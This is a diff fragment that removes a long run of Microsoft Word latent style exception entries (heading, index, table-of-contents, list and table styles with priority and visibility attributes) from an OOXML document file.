-    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
-    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
-    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
-    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
-    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
-    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Revision" w:semiHidden="1"/>
-    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
-    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
-    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
-    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
-    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
-    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
-    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
-    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
